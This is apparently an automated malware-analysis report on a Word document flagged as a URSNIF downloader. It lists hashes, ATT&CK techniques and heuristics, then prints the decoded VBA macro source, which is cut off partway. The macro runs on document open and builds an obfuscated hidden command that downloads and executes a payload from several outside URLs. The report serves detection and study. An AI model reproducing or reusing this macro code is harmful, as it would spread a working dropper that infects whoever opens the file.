Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 43f9e8e3269982ba…

MALICIOUS

Office (OLE)

72.0 KB Created: 2018-09-09 22:17:00 Authoring application: Microsoft Office Word First seen: 2019-10-01
MD5: ed6ac0f4ca144755e54fcf57ee937a2e SHA-1: d47187ede930b6f72c8fd1a284240bce93315fb5 SHA-256: 43f9e8e3269982ba4c2c56aa2cced1aa0b00d3d9e99dae4b2fc88ba4f7b6f74a
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The critical heuristic firing for Shell() call in VBA indicates that the macro attempts to execute commands. The ClamAV detection as Doc.Downloader.URSNIF-6729855-3 further supports its malicious nature as a downloader. The macro attempts to construct and execute a command line that appears to be setting up an environment for downloading a payload.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5666 bytes
SHA-256: 2b343f0198bcbdfd25ce93fe6707d46a4f4117b197646d614d3c797ac7ae0721
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "NYAmpiqCzPKYmP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Second "381407839" + "wimvADjwjIVv" + "YPESPjnCIpwL" + "CErYFXiN"
   Second "423893704" + "S"
   Second "Sz" + "4288"
   Second "7168" + "294543505" + "6103" + "2862"
Shell YSFcLC + YctmrAvGb + OSVjhwRGiaj, CStr(vbHide)
   Second "YrWIZ" + "mUnnopj" + "7396" + "BcE"
End Sub



Attribute VB_Name = "wRbZNlD"
Function YSFcLC()

On _
Error _
Resume _
Next
Second "NqCz" + "HBKFIASZTWw"
   Second "jQCZYPswm" + "wjnt" + "tp" + "490722702"
JIXJRLoBMk = Format(Chr(11 + 4 + 11 + 0 + 73)) + "md /" + "V^:^O/" + Format(Chr(8 + 3 + 7 + 0 + 49)) + Format(Chr(3 + 1 + 3 + 0 + 27)) + "^s" + "e^t" + " ^dR^" + "3^6=^" + "   ^ " + "^   " + "^ ^  " + "^    " + "^ ^ " + "^ ^}}{^"
Second "L" + "iqWoId" + "4074" + "3927"
   Second "476995799" + "SXE" + "pmiWMRzGjIY" + "5856"
   Second "6324" + "8010" + "Sju" + "bYNZ"
LHrSVVG = "h" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "t^" + "a" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^};^ka^" + "erb;^D" + "^B^u$"
Second "SpwO" + "440879874" + "cGfptrMAO" + "2102"
   Second "262" + "100853746" + "bb" + "hjwtdWbC"
WNLkzOl = "^ m^et^" + "I-^" + "e^" + "k^ovn^" + "I^;)" + "D" + "^Bu^$^ " + "^,^G" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^T$(" + "el^iF" + "d^ao^l" + "nwo^D^" + ".P^"
Second "tck" + "454007359"
   Second "SKVn" + "7426" + "q" + "knFtMPCUhEi"
EaVNK = "bt${yr" + "^t{)" + "^" + "F" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^l" + "$^ n" + "i^ " + "^G" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^" + "T" + "$("
Second "LdHWNTZqX" + "wjn"
   Second "25495363" + "hjV" + "kpfAJr" + "Z"
vjuHcBuUUk = "h" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "aer" + "o" + "^f;'" + "e" + "^" + "x^" + "e.^'^" + "+" + "iPA" + "^$+^" + "'" + "^"
YSFcLC = JIXJRLoBMk + LHrSVVG + WNLkzOl + EaVNK + vjuHcBuUUk
   Second "YiOSW" + "UNwXL"
   Second "335611277" + "q"
   Second "5701" + "B"
   Second "3376" + "aJzRJEPFVEjP" + "2355" + "296082838"
End Function
Function YctmrAvGb()

On _
Error _
Resume _
Next
Second "RV" + "uM" + "MK" + "FSsYTUDS"
   Second "KYCPcPBS" + "qkA" + "205758215" + "RkUfjTMz"
   Second "Rzbz" + "GOCAImKw"
jtMlmd = "\^'^+" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "i" + "lb^" + "up" + "^:vn^" + "e$" + "^=DB^u" + "^$;" + "^'^5^5" + "^" + "7" + "^' ^= "
Second "qjjF" + "UWkh"
   Second "t" + "7677"
PAnXPlKpfuB = "^iPA^$" + "^;" + ")^'@^'" + "(" + "^t^il^p" + "^"
Second "EYbowoWwdcGk" + "436467662"
   Second "fKCA" + "1808"
LodMOnwB = "S^.'m^" + "H^q^" + "a^x" + "/m^o" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^.yr^a" + "^dan^a" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "/" + "/:p" + "^tt" + "^" + "h^@^Z" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "/^set^"
Second "33551837" + "294342222"
   Second "jXj" + "F"
   Second "A" + "j" + "1261" + "310740337"
XioIhqbCb = "al^pm" + "e^t" + "/^d" + "^i." + Format(Chr(11 + 4 + 11 + 0 + 73)) + "^" + "a." + "us^u.^b"
Second "zTTkZY" + "8006" + "6910" + "u"
   Second "PjLc" + "474210193" + "CQpfHM" + "zoB"
   Second "BvETLpw" + "Ckri" + "qtdzNk" + "350115799"
   Second "iDEs" + "AHCckjm"
TlKvlKsZSoT = "^" + "if//:p" + "tth@^L" + "^Y/" + "^p^j" + "." + "r^"
Second "29930127" + "SbXUjUpM" + "262251550" + "8009"
   Second "Ef" + "pTfi"
   Second "WqjAbiDZFR" + "5935"
   Second "Qrbz" + "OLb"
   Second "O" + "TsH" + "430160037" + "C"
RtpAOs = "e" + "v^er" + "^k" + "//:^p" + "^t^th^"
Second "Q" + "100341861" + "7493" + "oG"
   Second "I" + "bCj"
CVhzDZrTNS = "@y^" + "o" + "^M/^m^" + "o" + Format(Chr(11 + 4 + 11 + 0 + 73)) + ".^tro" + "pnev" + "^a^d^e^" + "irra" + Format(Chr(11 + 4 + 11 + 0 + 73)) + "/" + "/^:p" + "^t" + "t^h@"
Second "jsFDP" + "f" + "55792575" + "4582"
   Second "OMw" + "9065" + "jtfh" + "66570442"
   Second "qWwz" + "110735629" + "215707093" + "7991"
ErLrPjPj = "^" + "H^" + "l" +
... (truncated)